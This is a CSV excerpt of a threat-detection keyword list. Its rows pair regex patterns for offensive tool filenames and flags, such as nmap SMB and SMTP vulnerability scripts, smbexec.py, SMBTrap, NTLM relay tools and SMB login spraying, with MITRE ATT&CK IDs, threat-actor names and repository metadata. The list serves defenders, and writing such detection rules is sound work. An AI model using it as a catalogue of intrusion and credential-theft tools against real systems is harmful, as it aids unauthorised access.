"* smb-enum-services.nse*",".{0,1000}\ssmb\-enum\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3217"
"* smb-enum-sessions.nse*",".{0,1000}\ssmb\-enum\-sessions\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3218"
"* smb-enum-shares.nse*",".{0,1000}\ssmb\-enum\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3219"
"* smb-enum-users.nse*",".{0,1000}\ssmb\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3220"
"* smbexec.py*",".{0,1000}\ssmbexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3221"
"* smb-flood.nse*",".{0,1000}\ssmb\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3222"
"* SMBGrab.pl*",".{0,1000}\sSMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","3223"
"* SMBHunt.pl*",".{0,1000}\sSMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","3224"
"* SMBList.pl*",".{0,1000}\sSMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","3225"
"* -SmbLoginSpray *",".{0,1000}\s\-SmbLoginSpray\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3226"
"* smb-ls.nse*",".{0,1000}\ssmb\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3227"
"* smb-mbenum.nse*",".{0,1000}\ssmb\-mbenum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3228"
"* smb-os-discovery.nse*",".{0,1000}\ssmb\-os\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3229"
"* smb-print-text.nse*",".{0,1000}\ssmb\-print\-text\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3230"
"* smb-protocols.nse*",".{0,1000}\ssmb\-protocols\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3231"
"* smb-psexec.nse*",".{0,1000}\ssmb\-psexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3232"
"* smbrelayserver.py*",".{0,1000}\ssmbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","3233"
"* smbscan.py *",".{0,1000}\ssmbscan\.py\s.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","3234"
"* smb-security-mode.nse*",".{0,1000}\ssmb\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3235"
"* smb-server-stats.nse*",".{0,1000}\ssmb\-server\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3236"
"* smbsr.db*",".{0,1000}\ssmbsr\.db.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3237"
"* smbsr.log*",".{0,1000}\ssmbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3238"
"* smbsr.log*",".{0,1000}\ssmbsr\.log.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3239"
"* smbsr.py*",".{0,1000}\ssmbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3240"
"* smbsr_results.csv*",".{0,1000}\ssmbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3241"
"* smb-system-info.nse*",".{0,1000}\ssmb\-system\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3242"
"* smbtrap2.py*",".{0,1000}\ssmbtrap2\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","3243"
"* smbtrap-mitmproxy-inline.py*",".{0,1000}\ssmbtrap\-mitmproxy\-inline\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","3244"
"* smb-vuln-conficker.nse*",".{0,1000}\ssmb\-vuln\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3245"
"* smb-vuln-cve2009-3103.nse*",".{0,1000}\ssmb\-vuln\-cve2009\-3103\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3246"
"* smb-vuln-cve-2017-7494.nse*",".{0,1000}\ssmb\-vuln\-cve\-2017\-7494\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3247"
"* smb-vuln-ms06-025.nse*",".{0,1000}\ssmb\-vuln\-ms06\-025\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3248"
"* smb-vuln-ms07-029.nse*",".{0,1000}\ssmb\-vuln\-ms07\-029\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3249"
"* smb-vuln-ms08-067.nse*",".{0,1000}\ssmb\-vuln\-ms08\-067\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3250"
"* smb-vuln-ms10-054.nse*",".{0,1000}\ssmb\-vuln\-ms10\-054\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3251"
"* smb-vuln-ms10-061.nse*",".{0,1000}\ssmb\-vuln\-ms10\-061\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3252"
"* smb-vuln-ms17-010.nse*",".{0,1000}\ssmb\-vuln\-ms17\-010\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3253"
"* smb-vuln-regsvc-dos.nse*",".{0,1000}\ssmb\-vuln\-regsvc\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3254"
"* smb-vuln-webexec.nse*",".{0,1000}\ssmb\-vuln\-webexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3255"
"* smb-webexec-exploit.nse*",".{0,1000}\ssmb\-webexec\-exploit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3256"
"* smtp-brute.nse*",".{0,1000}\ssmtp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3257"
"* smtp-commands.nse*",".{0,1000}\ssmtp\-commands\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3258"
"* smtp-enum-users.nse*",".{0,1000}\ssmtp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3259"
"* smtp-log4shell.nse*",".{0,1000}\ssmtp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","3260"
"* smtp-ntlm-info.nse*",".{0,1000}\ssmtp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3261"
"* smtp-open-relay.nse*",".{0,1000}\ssmtp\-open\-relay\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3262"
"* smtp-strangeport.nse*",".{0,1000}\ssmtp\-strangeport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3263"
"* smtp-vuln-cve2010-4344.nse*",".{0,1000}\ssmtp\-vuln\-cve2010\-4344\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3264"
"* smtp-vuln-cve2011-1720.nse*",".{0,1000}\ssmtp\-vuln\-cve2011\-1720\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3265"
"* smtp-vuln-cve2011-1764.nse*",".{0,1000}\ssmtp\-vuln\-cve2011\-1764\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3266"
